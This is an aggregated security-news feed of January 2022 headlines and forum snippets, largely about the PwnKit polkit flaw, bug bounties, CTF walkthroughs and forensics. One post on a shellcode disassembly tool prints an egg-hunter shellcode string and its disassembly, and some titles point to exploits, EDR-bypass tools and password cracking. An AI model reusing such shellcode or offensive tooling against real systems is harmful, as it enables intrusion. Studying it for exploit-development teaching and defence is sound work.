    Article URL: https://ariadne.space/2022/01/27/cve-2021-4034/ Comments URL: https://news.ycombinator.com/item?id=30105994 Points: 2 # Comments: 0  ( 4 min )
  • Open

    StellarParticle Campaign: Novel Tactics and Techniques | CrowdStrike
    submitted by /u/dmchell [link] [comments]
    Prime Minister’s Office Compromised: Details of Recent Espionage Campaign
    submitted by /u/dmchell [link] [comments]
  • Open

    Technical Analysis of CVE-2022-22583: Bypassing macOS System Integrity Protection (SIP)
    submitted by /u/shleimeleh [link] [comments]
    OSS PwnKit Detector (CVE-2021-4034)
    submitted by /u/SRMish3 [link] [comments]  ( 1 min )
    PwnKit: How to detect privilege escalation using CrowdSec
    submitted by /u/klausagnoletti [link] [comments]
    [New] Configuring Linux AuditD for Threat Detection
    submitted by /u/InH4te [link] [comments]
    How to use FaPro to simulate multiple devices in network
    submitted by /u/ntestoc3 [link] [comments]
  • Open

    Domain Persistence: Golden Certificate Attack
    Introduction Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an The post Domain Persistence: Golden Certificate Attack appeared first on Hacking Articles.  ( 10 min )
  • Open

    Sleep Attack: Intel Bootguard vulnerability waking from S3 (2021)
    Article URL: https://trmm.net/Sleep_attack/ Comments URL: https://news.ycombinator.com/item?id=30103498 Points: 1 # Comments: 0  ( 10 min )
    Xerox vulnerability to remotely brick network printers
    Article URL: https://neosmart.net/blog/2022/xerox-vulnerability-allows-unauthenticated-network-users-to-remotely-brick-printers/ Comments URL: https://news.ycombinator.com/item?id=30097563 Points: 2 # Comments: 0  ( 8 min )
    Polkit vulnerability was discovered in 2013
    Article URL: https://twitter.com/ryiron/status/1486207182404472832 Comments URL: https://news.ycombinator.com/item?id=30094998 Points: 2 # Comments: 0  ( 1 min )
  • Open

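    VulnHub DC-6 Target Machine: Detailed Penetration Walkthrough
    A very detailed penetration walkthrough of the DC-6 target machine, shared solely for learning and discussion.  ( 1 min )
    FreeBuf Morning Briefing | Tor Project Sues a Russian Court; UK Plans to Teach Children About the Consequences of DDoS Attacks
    The cybercrime unit of the UK's National Crime Agency (NCA) is launching a programme to educate children about the consequences of DDoS attacks.  ( 1 min )
    Full Translation and Analysis of the US "Memorandum on Improving the Cybersecurity of National Security, Defense and Intelligence Systems"
    This article analyzes the "Memorandum on Improving the Cybersecurity of National Security, Defense and Intelligence Systems" (NSM) signed by US President Biden from three angles: the background of its release, its six highlights, and the industry's reaction.  ( 1 min )
    Efficient Information Gathering for Penetration Testing (Consolidated)
    Almost everyone learning penetration testing is told that information gathering is the essence of penetration testing, but is that really so?  ( 2 min )
    US Government Officially Releases Zero Trust Strategy, Aiming to Meet Specific Goals by Fiscal Year 2024
    Launches a government-wide migration to a zero trust framework to substantially reduce the risk of cyberattacks against the federal government's digital infrastructure.
    python_mmdt: Comparing ssdeep, tlsh, vhash and mmdthash (Part 6)
    Using a correlation analysis of 400 test files, this article compares how ssdeep, tlsh, vhash and mmdthash perform relative to one another.  ( 3 min )
    Implementing SMS Alerts for CobaltStrike Check-ins [Another Useless Trick Added]
    Ding, a new host has come online, please check!  ( 1 min )
    Ten Departments Including the Office of the Central Cyberspace Affairs Commission Release the "Digital Village Development Action Plan (2022-2025)"
    Centered on its development goals, the Action Plan lays out 26 key tasks across 8 areas.
    [Intelligence Tools] 24 Government Open Data Platforms in China and Abroad
    Open data, especially government open data, is an important but still under-exploited vast resource.  ( 1 min )
    Linux Polkit Root Privilege Escalation Vulnerability (CVE-2021-4034)
    polkit is an application-level toolkit that enables communication between processes of different priority levels by defining and auditing permission rules.  ( 1 min )
    "Gartner 2022 Critical Capabilities for Network Firewalls" Report Released; Fortinet Earns the Highest Scores in Three Use Cases
    The World Economic Forum estimates that global cybercrime costs will reach a staggering 2.2 trillion US dollars in 2022.  ( 1 min )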
  • Open

    SecWiki News 2022-01-27 Review
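    2021 IoT Device CVE Leaderboard by ourren; Reproducing Two Flare-On 8 Challenges by ourren; Incident Response: Detecting Trojans with Yara Rules by ourren; ISOON2021 On-site Domain Penetration Write-up by ourren; Decentralized CS Check-in by ourren; Vulnerability Monitoring Platform: Monitor by ourren; On the Importance of API Security and Approaches to Governance by ourren. For more of the latest articles, visit SecWiki  ( 2 min )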
  • Open

    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on InfoSec Write-ups »  ( 4 min )
    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on Medium »  ( 4 min )
    How I was able to get HOF in one of the world’s leading hotel brands by 30 mins of googling.
    Hey Folks! Yash Dharmani (H1GH4T) here, Hope you’re all doing good. Continue reading on Medium »  ( 2 min )
    Finding bugs in Symfony
    Credit: How I was able to find multiple vulnerabilities of a Symfony Web Framework web application | by Abid Ahmad | Jan, 2022 | Medium Continue reading on Medium »  ( 1 min )
    Kindle You’re My Little Cuddle Bug Full
    You’re My Little Cuddle Bug Read Online. Download Link => You’re My Little Cuddle Bug. Book Description: Celebrate your little cuddle… Continue reading on Medium »  ( 2 min )
    Uppsala Security and Nakji Network Run a Bug Bounty Totaling $200,000
    Uppsala Security is running a bug bounty program together with Nakji Network, a blockchain on-chain data indexing project. Continue reading on Medium »  ( 2 min )
  • Open

    CyberDefenders | Hacked
    The Forensics write-ups  ( 4 min )
    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and…  ( 3 min )
    Bounty Hacker CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s Bounty Hacker CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    WGEL CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s WGEL CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    Day 19, Web Reconnaissance Or Information Gathering — Part 4#100DaysofHacking
    Get all the writeups from Day 1 to 17, Click Here Or Click Here.  ( 3 min )
  • Open

    Improper access control for users with expired password, giving the user full access through API and Git
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1285226 - Bounty: $950
    subdomain takeover on fddkim.zomato.com
    Zomato disclosed a bug submitted by mosec9: https://hackerone.com/reports/1130376 - Bounty: $350
  • Open

    This subreddit in the WayBack Machine.
    https://web.archive.org/web/*/https://www.reddit.com/r/opendirectories/ https://web.archive.org/web/*/https://old.reddit.com/r/opendirectories/ submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
  • Open

    CyberSoc | Cyber Detective CTF Write Up — Evidence Investigation
    OSINT-focused CTF Challenges. OSINT in Government, Stego, Crypto multiple languages, WIFI, EXIF and more Continue reading on Medium »  ( 4 min )

  • Open

    Pwnkit: How to exploit and check
    submitted by /u/DevSec23 [link] [comments]
    Reversing ALPHV (aka BlackCat): Rust-Based Ransomware
    submitted by /u/rsobers [link] [comments]
    Bypassing Little Snitch Firewall with Empty TCP Packets
    submitted by /u/hackers_and_builders [link] [comments]
    Perfect wordlist to discover directories and files on target size with tools like ffuf.
    submitted by /u/mexhanical [link] [comments]  ( 1 min )
    wholeaked: a file-sharing tool that allows you to find the responsible person in case of a leakage
    submitted by /u/utku1337 [link] [comments]  ( 2 min )
    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/apanonimo [link] [comments]
    Self-contained exploit for CVE-2021-4034 (Pkexec 1-day LPE)
    submitted by /u/ly4k_ [link] [comments]
    Exploit for CVE-2021-4034 that does not leave syslog entries
    submitted by /u/hermajordoctor [link] [comments]
    Webcam Hacking (again) - Safari UXSS
    submitted by /u/Straight_Finding_756 [link] [comments]
  • Open

    [Question] Using Shodan or another 'search engine' to find MS SQL servers
    Is it possible to use Shodan or another engine to find public-facing SQL servers? More specifically, if you know of a database name, could it be found? I realize MS SQL has some default ports, and I can search for those, but I'm curious to know if it's possible to search for a database name, too. TIA. submitted by /u/Drivingmecrazeh [link] [comments]  ( 1 min )
    Password cracking options..
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? What's the price of it? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    What does a booter/stresser site need to do in order to be legal?
    I've seen tons of these booter projects and am aware that under certain circumstances the websites themselves are completely legal. What separates Redwolf from other DDoS sites you find all around in terms of legality? I understand that Redwolf is used legally and the other ones usually aren't, but what makes the website itself legal or illegal? submitted by /u/raultheuniverse [link] [comments]  ( 1 min )
    Accidentally DIRBed the wrong site
    I was playing around with dirb and was going to run it on a private test site but had a typo and accidentally ran it on an actual website and didn't realize for a few minutes that I had messed it up. Should I reach out to site administrator or be concerned or is it ok? EDIT: Lmfao at the comments keep them coming submitted by /u/Mesachi_06 [link] [comments]  ( 2 min )
    Sitting through Offsec 2-3 day exams
    I'm wondering what people with full time jobs and kids are doing about the Offsec courses with 2-3 day exams. Are you just biting the bullet and taking the exam or just taking the training and not taking the exam? After OSCP I've been just taking the Offsec trainings and going over material, but without a goal like taking an exam and getting the certification there's very little motivation to study the material. I usually go over the pdf to pick up some new tricks and move on. After full day of work and family I don't even know when to find 2-3 days straight to do the exam. I still don't understand why Offsec doesn't change the exams to 5 days and let people do it like it's done in a real world instead of putting unnecessary pressure with ctf style exam time frame. Also when I took OSCP exam I didn't have to deal with being monitored. I get up from computer chair every 20 minutes and I can see getting annoyed about having to deal with this for 2-3 days pretty fast. submitted by /u/ravenoverflow [link] [comments]  ( 5 min )
  • Open

    A brief overview of JWT and its exploits
    Introduction Continue reading on System Weakness »
    A brief overview of JWT and its exploits
    Introduction Continue reading on Medium »
    Beginner Bug Bounty Guide - Part 4
    Previous : Beginner Bug Bounty Guide - Part 3 Continue reading on Medium »  ( 2 min )
    Beginner Bug Bounty Guide - Part 3
    Previous : Beginner Bug Bounty Guide - Part 2 Continue reading on Medium »
    How to spoof e-mails. (DMARC, SPF, and Phishing)
    Note: sanitization of these screenshots was performed to protect the identities of stakeholders involved. Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - DIRECTORY TRAVERSAL LAB SOLUTIONS
    Directory Traversal lets attackers access restricted directories on a web server and the web server's root directory… Continue reading on Medium »  ( 3 min )
  • Open

    Redis – Vulnerability Disclosure Program
    Article URL: https://hackerone.com/redis-vdp Comments URL: https://news.ycombinator.com/item?id=30091276 Points: 2 # Comments: 0
    Local privilege escalation vulnerability in polkit’s pkexec
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30086222 Points: 2 # Comments: 0  ( 8 min )
    PwnKit: Local Privilege Escalation Vulnerability Discovered in Polkit’s Pkexec
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30086204 Points: 1 # Comments: 0  ( 7 min )
    Android security tool APKLeaks patches critical vulnerability
    Article URL: https://portswigger.net/daily-swig/android-security-tool-apkleaks-patches-critical-vulnerability Comments URL: https://news.ycombinator.com/item?id=30085811 Points: 1 # Comments: 0  ( 3 min )
    Local privilege escalation vulnerability in polkit’s pkexec (CVE-2021-4034)
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30081671 Points: 1 # Comments: 0  ( 8 min )
    PwnKit: Vulnerability in Polkit (CVE-2021-4034)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30081666 Points: 5 # Comments: 0  ( 7 min )
  • Open

    Password cracking tools
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    Timeline from MFTECmd VS plaso & log2timeline
    I was taught these 2 methods of creating timelines from MFT. I am familiar with using the timeline output from MFTECmd. Is there a reason I should be using timeline from plaso & log2timeline? Are there benefits or details there I could miss from using MFTECmd? Because it seems slightly more tedious to generate timeline using plaso & log2timeline. Comments from those who use both? submitted by /u/bangfire [link] [comments]  ( 1 min )
    Encase Endpoint
    Any users of this product? How useful do you think it is? Have any real competitors popped up? (I've heard Symantec mentioned) I've heard some former customers say it was 10x+ cheaper than running multiple physical extractions with a large consultant submitted by /u/Nick_Investor [link] [comments]  ( 1 min )
  • Open

    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    chvancooten/NimPackt-v1: Nim-based assembly packer and shellcode loader for opsec & profit
    submitted by /u/dmchell [link] [comments]
    Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA
    submitted by /u/SCI_Rusher [link] [comments]
    Hacktivist group shares details related to Belarusian Railways hack
    submitted by /u/dmchell [link] [comments]
  • Open

    10 GiB of Classic music in FLAC or APE format
    https://funambule.org/classique/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    How can I stop getting my WiFi flagged??
    My network provider (or rather Warner Bros.) has flagged a download that I attempted for Dune (the 2021 movie). I wanna know how I can stop having my WiFi's address flagged for DMCA claims. submitted by /u/Raven_Claw7621 [link] [comments]  ( 1 min )
    AU/NZ/CA - TV & movie archive
    submitted by /u/vsharer [link] [comments]
    rotary telephones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Sooooo..... What happened to the Homeland Security post?
    be me see post click and see files nope the fuck out of there.... submitted by /u/ringofyre [link] [comments]  ( 1 min )
  • Open

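    [Security Advisory] Linux Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034...
    Recently, a local privilege escalation vulnerability in the Polkit toolkit on Linux has surfaced online; any unprivileged local user can exploit it to obtain root privileges...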
  • Open

    CVE-2022-0185: Container+Kubernetes manifest as crash POC
    Article URL: https://github.com/discordianfish/cve-2022-0185-crash-poc/blob/main/crash.c Comments URL: https://news.ycombinator.com/item?id=30087809 Points: 1 # Comments: 0  ( 1 min )
  • Open

    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    SecWiki News 2022-01-26 Review
    2021 Annual Advanced Threat Research Report by ourren; [HTB] Safe Writeup by 0x584a. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

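    Preparing for and Sitting the Old-Format OSCP: Lessons Learned
    I passed the OSCP exam in December 2021. Because the OSCP exam was revised on January 11, 2022, the exam-experience part of this article is of limited reference value; the practical tips and preparation parts are still worth consulting.  ( 1 min )
    FreeBuf Morning Briefing | New Linux Vulnerability Disclosed, Affecting All Versions; Segway Online Store Attacked
    A security vulnerability (CVE-2021-4034) exists in Polkit's pkexec component, which means the default configuration of almost every Linux distribution contains this vulnerability; attackers can use it to obtain root privileges on the system.  ( 1 min )
    A Study of Techniques Used in Phishing Attacks
    A study of phishing approaches.  ( 1 min )
    How to Use Yakit for Traffic Interception
    Yakit largely implements Burp's interception and packet-capture features and covers most practical use cases. As an open-source project that has only recently started, we hope you will give it plenty of attention.  ( 1 min )
    Serious Programming Bug May Lead to File Deletion; Hackers Use New Malware to Evade Detection | Global Cybersecurity Highlights, January 26
    The maintainers of the Rust programming language released a security update for a high-severity vulnerability that a malicious party could abuse to wipe files and directories from a vulnerable system without authorization.  ( 1 min )
    How to Use FaPro to Simulate Devices in Bulk
    With FaPro, a single command creates a virtual network and simulates multiple different devices in it.  ( 1 min )
    "Report on the Current State and Development of Cybersecurity Awareness Education in Chinese Enterprises" Released
    The "Report on the Current State and Development of Cybersecurity Awareness Education in Chinese Enterprises" (hereinafter "the Report") was released recently.  ( 1 min )
    "Measures for the Supervision of Information Technology Outsourcing Risks of Banking and Insurance Institutions" Released, Tightening Control of Outsourcing Risk
    The Measures comprise 7 chapters and 46 articles and set out comprehensive requirements for IT outsourcing risk management at banking and insurance institutions.
    [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Windows Platform
    This article discusses rootkits in terms of their lifetime, the effects they can achieve, and the feasibility of using the technique to carry out attacks.  ( 1 min )
    "Zhejiang Province Public Data Regulations" to Take Effect March 1, Again Emphasizing Personal Information Security
    The Regulations comprise fifty-one articles and explicitly call for building a public data platform, establishing a public data sharing mechanism, and creating a system for the orderly opening of public data.
    Expert Judging Panel for the First "New Forces in Cybersecurity" Conference Officially Announced
    14 expert judges from the cybersecurity industry; come and see who they are!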
  • Open

    Specific Payload makes a Users Posts unavailable
    FetLife disclosed a bug submitted by castilho: https://hackerone.com/reports/1176794 - Bounty: $100
  • Open

    ROP Hello World!
    submitted by /u/Kubiszox [link] [comments]
  • Open

    Ethical Hacking — Buffer Overflow Part 2
    Fuzzing is a software testing technique that supplies invalid data, that is, unexpected or random data, as input to a… Continue reading on Medium »  ( 2 min )

  • Open

    Is there anything equivalent to Java's requestdispatcher.forward system in other programming languages?
    It's the easiest thing to leverage for pre-auth bugs: just looking at web.xml and leveraging internal forwards to touch APIs that normally require auth, and I would love to find something similar in other languages. The closest thing I've found is a special type of open redirect where the devs decided to keep previous session data, making it useful for auth bypasses in some PHP projects. See, the thing is, open redirects usually kill previous session data, making them useless for auth bypassing on their own, and the Java forward system is like an internal version/server-sided version of a redirect that keeps session data and forwards everything along intact. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Could blind mass assignment be a rare type of bug?
    Some people know it as reflection binding, mass assignment or insecure direct object mapping, which is the opposite of insecure direct object reference: you're basically writing data instead of reading it, or appending data. So I've noticed in some places I'll send hidden parameters and the JSON response won't show anything interesting, but I'll refresh the page and I'll get like a discount or something. Say I add the parameters isSpecialDiscount: true; the response won't show anything related, so it's a blind mass assignment bug, and in some cases I've seen partial blind mass assignment, where the JSON response will change to true for some things but still say false for others despite the request setting it as true, but when I refresh the page the server grants me the discount, proving it's processing the input and assigning my session a discount. I've never really seen people discuss blind or partial blind mass assignment being a thing, but I'm finding them a lot more now; it's weird. Usually I used to look at the JSON response to see if parameter values are changing, but I now see I can't even trust that completely to prove a mass assignment bug exists. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Anyone who works in a SOC dealing with disadvantages in maturing due to lack of management experience?
    Just curious how some of you guys who work in a SOC, whether it’s as an analyst or engineer, with a manager who doesn’t have the background. Do you have a lot of influence in shaping the SOC? Run into roadblocks justifying tools or maybe maturing your processes? submitted by /u/bankster24 [link] [comments]  ( 2 min )
    Looking for first steps in changing careers with an unrelated(?) master's degree
    Hello /r/AskNetsec, this is my first post on here. I recently (coming up on a year) graduated with a M.A. in Forensic Psychology and Intelligence Analysis. This degree is not opening the doors in the psychology field I was hoping it would, and quite frankly, the work I have done in this field is not what I wanted out of my career. I have always been fascinated by cybersecurity, and it is a large part of the reason I decided to pursue the Intel part of my degree. My question to you all is this: What first steps would someone in my position take in trying to get into the Cybersecurity field? Ideally I would like to eventually work my way to a Security Analyst position. I have no qualms about starting at the lowest positions to work my way up, but am clueless on where to start. I have some coding knowledge in Python and Java, but as far as IT knowledge I am a total newbie. Are there certifications or courses I should prioritize? I would like to avoid going back to a university setting, as I have spent enough time and money doing that for the time being. Thank you to anybody who reads this and decides to respond, I really appreciate it. submitted by /u/Lambeau_Leap [link] [comments]  ( 1 min )
    Worth getting Net+/Sec+ with 3 years of exp in Blue Teaming?
    Heyhey, I'm not quite new to blue teaming (threat hunt & detection) but would like to have my options open in case I want to jump to a more senior tech role in the next year or so. I have a computer engineering degree and a SANS 401 (GSEC) cert too. Do you think it's worth getting? Thanks! submitted by /u/youmakemismile [link] [comments]  ( 1 min )
    Do RSA key fobs really strengthen security?
    Originally they did, I know. But there was this story about Chinese hackers compromising RSA, getting into the deepest levels of the production and key generation process. As a result, RSA alerted each and every customer of theirs and told them to use a personal PIN together with the code generated by the key fob. This is what I'm doing now on a daily basis. Now you have: your account password; your PIN you use together with the RSA-generated code; and the RSA-generated code. The RSA codes are compromised and you have to assume that there's some people out there knowing all the codes and algorithms. But that means they really aren't worth much; basically you only have a password and another, limited password called PIN, which is usually shorter and numbers only. The most you can expect from this is that, let's say, 10 characters alphanumeric + 6 digits is somewhat better than just the 10 characters alphanumeric, plus there's a good chance that they are stored in different systems, so less likely to be seized at the same time by some black hats. Is that true or do these key fobs still have an added value? submitted by /u/mshthn [link] [comments]  ( 2 min )
    Simple question about nmap
    If my friend tells me what his public IP address is and I use nmap to do a port scan on his public IP address, then what exactly is being port scanned? Since every device in his house will have the same public IP address. submitted by /u/LagunaLoireFF8 [link] [comments]  ( 2 min )
    Received H1 bug bounty but think I maybe should have gotten more. Am I just being greedy?
    I have received a bounty just under 20k. I understand that that’s a lot of money but I am curious from experts whether this is about the most I’ll get and I should just move on. I can’t disclose too much but I found a way to make myself very very rich very easily (no actual tools or request spoofing required). I’ve thought of some ways that one could have theoretically easily taken the free money with no trace and ran if they were a legitimate crook. The bug had been around for a while (Longer than a week). Unsure of how bad it was in terms of actual internal damages. I can honestly say that I probably saved them potential millions if not actual millions. It feels like the amount I received is honestly not much at all given the severity of it. Having said all of that, it wasn’t very hard to reproduce. It was less of a penetration report involving much skill and more of a “holy shit guys, your product is clearly broken and I can’t believe this hasn’t been patched” Am I being completely unreasonable/greedy? I should also note that their market cap is far into the billions which is why I am making this post to begin with. They’re a major industry leader. submitted by /u/csthrowawayyyy [link] [comments]  ( 4 min )
    Is an associates degree worth getting?
    I was told experience and certs are mostly required for most jobs aside from roles in management, which requires a BS or even masters. So I am just curious if there is any value in just getting an AS. The role that currently interests me is SOC analyst if that helps. I also heard of the WGU online program for a BS or masters in cybersecurity. If I plan on doing management in the future, is it worth getting my degree through this program? submitted by /u/RaZdoT [link] [comments]  ( 2 min )
  • Open

    How “Docker” can help you become a better hacker
    Continue reading on Medium »
    Ensuring protocol security with Immunefi bug bounty program
    Calling all devs and hackers. Help enhance our smart contract security and prevent thefts, freezes, and unintended changes and earn. Continue reading on Medium »  ( 2 min )
    I found a way to extract passwords from any iOS device. When I reported it to Apple? Silence.
    Apple’s Bug Bounty program, in theory, incentivizes programmers to report flaws they find in the company’s code. In practice? Not so much. Continue reading on Medium »  ( 3 min )
    What I learnt from reading 220* IDOR bug reports.
    IDOR — Insecure Direct Object Reference, abuse of the lack of authentication at every stage. Continue reading on Medium »  ( 3 min )
    First Bounty! Disable 2FA of any user via OTP bypass
    Getting that first bug bounty is a special feeling for any bug hunter. This is my first write up so please bear with me. Continue reading on Medium »  ( 1 min )
    First Valid BUG Finding At Microsoft And I Got the Acknowledgments Page Microsoft
    Hi Everyone. Continue reading on Medium »  ( 2 min )
    How I could have read your confidential bug reports by simple mail?
    Hey Everyone, Hope you’re doing safe and sound. Continue reading on InfoSec Write-ups »  ( 2 min )
    How I was able to takeover accounts in websites deal with Github as a SSO provider
    Introduction Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    pwntools on m1 mac?
    Hello, I'm working on creating a tutorial binary exploit for an M1-based Mac. For simplicity and portability I'm using an M1-based Kali VM and trying to use aarch64 shellcraft but getting weird errors, and wondering if anyone has successfully gotten pwn to work for them?
    Main error message when trying to use asm() on a shellcraft payload is:
    pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType()
    Try installing binutils for this architecture:
    https://docs.pwntools.com/en/stable/install/binutils.html
    but don't know what binutils arch it's expecting; I tried installing a couple to no avail.
    Appreciate any of y'all's time, thanks submitted by /u/superiorpyre [link] [comments]  ( 1 min )
    Fuzzing Ethereum Smart Contract using Echidna - Blockchain Security #1
    submitted by /u/pat_ventuzelo [link] [comments]
    Shellcode to x86, x64 Assembly
    Sharing a quick python3 command line tool I made to disassemble shellcode without having to remember the nuances of python2 v python3 strings and writing to a file each time: https://gitlab.com/stormblest/exploit-dev-tools/-/blob/main/shellcode2asm.py Includes python unittests in Gitlab. Example:
    ```
    $ python3 shellcode2asm.py "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2" -a 32
    shellcode: "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2"
    00000000  BB90509050        mov ebx,0x50905090
    00000005  31C9              xor ecx,ecx
    00000007  F7E1              mul ecx
    00000009  6681CAFF0F        or dx,0xfff
    0000000E  42                inc edx
    0000000F  60                pusha
    00000010  8D5A04            lea ebx,[edx+0x4]
    00000013  B021              mov al,0x21
    00000015  CD80              int 0x80
    00000017  3CF2              cmp al,0xf2
    00000019  61                popa
    0000001A  74ED              jz 0x9
    0000001C  391A              cmp [edx],ebx
    0000001E  75EE              jnz 0xe
    00000020  395A04            cmp [edx+0x4],ebx
    00000023  75E9              jnz 0xe
    00000025  FFE2              jmp edx
    ```
    submitted by /u/blutitanium [link] [comments]  ( 1 min )
  • Open

    Able to steal private files by manipulating response using Auto Reply function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1387320 - Bounty: $2000
    Able to steal private files by manipulating response using Compose Email function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1373784 - Bounty: $2000
    Subdomain Takeover
    Mail.ru disclosed a bug submitted by official_dhivish: https://hackerone.com/reports/1348504
    Cross site scripting via file upload in subdomain ads.tiktok.com
    TikTok disclosed a bug submitted by blubluuu: https://hackerone.com/reports/1433125 - Bounty: $500
  • Open

    Watering hole deploys new macOS malware, DazzleSpy, in Asia
    submitted by /u/dmchell [link] [comments]
    Extracting Cobalt Strike Beacon Configurations - Elastic Security Research
    submitted by /u/dmchell [link] [comments]
    RBCD WebClient attack | Franky's WebSite
    submitted by /u/dmchell [link] [comments]
    hlldz/RefleXXion: RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Major Linux PolicyKit security vulnerability uncovered: Pwnkit
    Article URL: https://www.zdnet.com/article/major-linux-policykit-security-vulnerability-uncovered-pwnkit/ Comments URL: https://news.ycombinator.com/item?id=30077665 Points: 7 # Comments: 0  ( 4 min )
    Rust vulnerability enables attackers to delete files and directories
    Article URL: https://developer-tech.com/news/2022/jan/24/rust-vulnerability-enables-attackers-delete-files-and-directories/ Comments URL: https://news.ycombinator.com/item?id=30072868 Points: 5 # Comments: 1  ( 4 min )
    Dark Souls servers taken down following discovery of critical vulnerability
    Article URL: https://arstechnica.com/information-technology/2022/01/dark-souls-servers-taken-down-following-discovery-of-critical-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30069692 Points: 3 # Comments: 0  ( 2 min )
  • Open

    pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    submitted by /u/TheSwedishChef24 [link] [comments]
    Mind Your Dependencies: Defending against malicious npm packages
    submitted by /u/SRMish3 [link] [comments]
    We purchased a machine from China and it came with malware preinstalled
    submitted by /u/lormayna [link] [comments]  ( 2 min )
    Cracking Randomly Generated Passwords
    submitted by /u/hyperreality_monero [link] [comments]  ( 1 min )
    RBCD attack & defense. From Domain User to DA on default domain controllers settings. Including webclient service activation
    submitted by /u/k3nfr4 [link] [comments]  ( 1 min )
    Finding vulnerabilities in Swiss Post’s future e-voting system - Part 1
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    Recovering redacted information from pixelated videos
    submitted by /u/breakingsystems [link] [comments]  ( 1 min )
    Solarwinds Web Help Desk: When the Helpdesk is too Helpful
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://seclists.org/oss-sec/2022/q1/80 Comments URL: https://news.ycombinator.com/item?id=30077271 Points: 112 # Comments: 41  ( 5 min )
    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Comments URL: https://news.ycombinator.com/item?id=30075993 Points: 4 # Comments: 2  ( 5 min )
  • Open

    3 must-know tools for information research
    During an internet search, we often come across data formats that at first glance cannot be used directly. Continue reading on Medium »  ( 3 min )
    Python: Speech To Text Conversion
    Simple Python code for converting audio data to text format Continue reading on Medium »  ( 1 min )
    Ukraine: tracking the deployments
    Making sense of the open source intelligence Continue reading on HOW TO STOP FASCISM »
  • Open

    Trainings or Courses or Labs?
    Howdy all, Any idea where I can find the following for Memory Forensics? I’m trying my best to learn the most of Memory Forensics! Have completed the Cyber Defenders lab! Free or Minimal Cost one would be appreciated as I’m just a beginner in my field! Thanks! submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    FTK Imager gets hung
    So I was attempting to take an E01 image of a file server. But it would just get hung right away. For FTK I tried to run it as a logical volume to image it, and still it would get hung. So I used a live boot of Linux and tried to use Guymager and it would just close. It is a RAID 6 I believe. Any other recommendations on how I could take an E01 image of the FS? Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 2 min )
    CHFI certification is good at discounted price
